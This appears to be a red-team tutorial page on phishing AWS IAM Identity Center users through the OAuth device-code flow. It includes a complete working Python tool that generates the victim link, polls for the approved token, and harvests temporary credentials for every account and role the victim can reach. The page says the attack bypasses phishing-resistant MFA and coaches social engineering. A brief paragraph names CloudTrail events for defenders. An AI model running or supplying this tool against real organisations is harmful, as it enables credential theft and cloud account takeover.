AWS - Identity Center & SSO Unauthenticated Enum
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Initially proposed in this blog post, it is possible to send a user of AWS IAM Identity Center (formerly AWS SSO) a device-authorization link; if the user approves the request, the attacker obtains an SSO access token that impersonates the user and gives access to every account and role (permission set) the user can reach through Identity Center.
The requirements for this attack are:
The victim organisation uses IAM Identity Center
The attacker knows the access portal subdomain used by the victim: <victimsub>.awsapps.com/start
With just that information the attacker can send the user a link which, if accepted, grants the attacker access to everything the user's AWS account can reach.
Finding the subdomain
The attacker's first step is to find the subdomain the victim company uses for its Identity Center access portal. This can be done through OSINT or by guessing and brute-forcing, since most companies use their name or a variation of it.
With the subdomain known, the next thing to obtain is the region in which Identity Center was configured, because every later sso-oidc and sso API call must be made against that region:
Generate the link for the victim & Send it
Run the following code to generate an AWS SSO login link for the victim to authenticate with. For the demo, run it in a Python console and do not exit it, because the client credentials and device code returned by StartDeviceAuthorization are needed later to redeem the token:
Send the generated link (the verificationUriComplete URL, which already embeds the user code) to the victim using your awesome social engineering skills!
Wait until the victim accepts it
If the victim is already logged in to AWS they only need to accept granting the permissions; if not, they must log in first and then accept. This is how the prompt looks nowadays:
Get SSO access token
If the victim accepted the prompt, run this code to obtain an SSO access token that impersonates the user (CreateToken with the device_code grant; while the prompt is still pending the call fails with AuthorizationPendingException, so poll it until it succeeds or the device code expires):
The SSO access token is valid for 8 hours by default; the expiresIn field of the CreateToken response gives the actual lifetime.
Impersonate the user
It is worth noting that this attack works even when an "unphishable" MFA such as WebAuthn/FIDO2 is enforced. The victim never leaves the legitimate AWS domain: they log in to their real Identity Center portal, complete their real MFA there, and then approve an authorization request. Unlike classic phishing, where the attacker has to impersonate the login domain, the OAuth device-code flow is designed precisely so that one device holds the code while the user authenticates on another machine. Once the prompt is approved, whoever holds the device code (here, the attacker) can redeem it for the user's token. From the defender's side, the RegisterClient, StartDeviceAuthorization and CreateToken calls to the sso-oidc service and the subsequent GetRoleCredentials calls are recorded in CloudTrail, which is where to hunt for this activity.
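The whole chain covered by the previous steps (generating the link, redeeming the device code for the SSO access token, and then enumerating and assuming every account and role the victim can reach), as an added Python example that is not the original page's code. It uses the real boto3 sso-oidc and sso APIs (RegisterClient, StartDeviceAuthorization, CreateToken, ListAccounts, ListAccountRoles, GetRoleCredentials); the region, start URL and client name are placeholders, and boto3 is imported lazily inside build_clients so the flow helpers can be exercised offline with stub clients.

```python
import time
from typing import Any, Callable, Dict, Iterator, List

DEVICE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"


def build_clients(region: str):
    """Real boto3 clients for the victim's Identity Center region (imported
    lazily so the helpers below can be driven by stub clients offline)."""
    import boto3
    return (boto3.client("sso-oidc", region_name=region),
            boto3.client("sso", region_name=region))


def start_device_flow(oidc, start_url: str, client_name: str = "sso-client") -> Dict[str, Any]:
    """Register a public OIDC client and start the device-authorization grant.

    Returns everything the attacker must keep: the link for the victim plus the
    client credentials and device code needed to redeem the token later.
    client_name is arbitrary (assumption: any string is accepted).
    """
    reg = oidc.register_client(clientName=client_name, clientType="public")
    auth = oidc.start_device_authorization(
        clientId=reg["clientId"], clientSecret=reg["clientSecret"], startUrl=start_url
    )
    return {
        "client_id": reg["clientId"],
        "client_secret": reg["clientSecret"],
        "device_code": auth["deviceCode"],
        "user_code": auth["userCode"],
        "link": auth["verificationUriComplete"],  # send this to the victim
        "interval": auth.get("interval", 5),       # polling interval in seconds
        "expires_in": auth["expiresIn"],           # device-code lifetime in seconds
    }


def wait_for_token(oidc, flow: Dict[str, Any],
                   sleep: Callable[[float], None] = time.sleep) -> Dict[str, Any]:
    """Poll CreateToken until the victim approves the prompt.

    AuthorizationPendingException means "not approved yet" and SlowDownException
    means "back off"; ExpiredTokenException and AccessDeniedException (the user
    declined) propagate and end the attempt.
    """
    interval = flow["interval"]
    deadline = time.monotonic() + flow["expires_in"]
    while time.monotonic() < deadline:
        try:
            return oidc.create_token(
                clientId=flow["client_id"], clientSecret=flow["client_secret"],
                grantType=DEVICE_GRANT, deviceCode=flow["device_code"],
            )
        except oidc.exceptions.AuthorizationPendingException:
            pass
        except oidc.exceptions.SlowDownException:
            interval += 5  # RFC 8628: add 5 s to the interval on slow_down
        sleep(interval)
    raise TimeoutError("device code expired before the victim approved it")


def _paginate(call: Callable[..., Dict[str, Any]], key: str, **kwargs) -> Iterator[Dict[str, Any]]:
    """Follow nextToken pagination of the sso portal API."""
    token = None
    while True:
        resp = call(**kwargs, **({"nextToken": token} if token else {}))
        yield from resp.get(key, [])
        token = resp.get("nextToken")
        if not token:
            return


def enumerate_access(sso, access_token: str) -> List[Dict[str, Any]]:
    """Every account/permission-set role the token can reach, with short-lived
    credentials for each one (exactly what the victim could assume)."""
    found = []
    for acct in _paginate(sso.list_accounts, "accountList", accessToken=access_token):
        roles = _paginate(sso.list_account_roles, "roleList",
                          accessToken=access_token, accountId=acct["accountId"])
        for role in roles:
            creds = sso.get_role_credentials(
                roleName=role["roleName"], accountId=acct["accountId"], accessToken=access_token
            )["roleCredentials"]
            found.append({
                "account_id": acct["accountId"], "account_name": acct.get("accountName"),
                "role": role["roleName"], "access_key_id": creds["accessKeyId"],
                "secret_access_key": creds["secretAccessKey"],
                "session_token": creds["sessionToken"], "expiration": creds["expiration"],
            })
    return found


if __name__ == "__main__":
    import sys
    region, start_url = sys.argv[1], sys.argv[2]  # e.g. us-east-1 https://victim.awsapps.com/start
    oidc, sso = build_clients(region)
    flow = start_device_flow(oidc, start_url)
    print(f"Send to the victim: {flow['link']}  (user code {flow['user_code']})")
    token = wait_for_token(oidc, flow)
    print(f"Got SSO access token, valid for {token['expiresIn']} s")
    for entry in enumerate_access(sso, token["accessToken"]):
        print(entry["account_id"], entry["account_name"], entry["role"], entry["access_key_id"])
```

The returned credentials are ordinary temporary STS credentials, so each entry can be dropped into AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN and used with the CLI or SDKs until its expiration. Keep the polling interval returned by StartDeviceAuthorization: hammering CreateToken faster than that only earns SlowDownException responses.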
For more info about this check this post.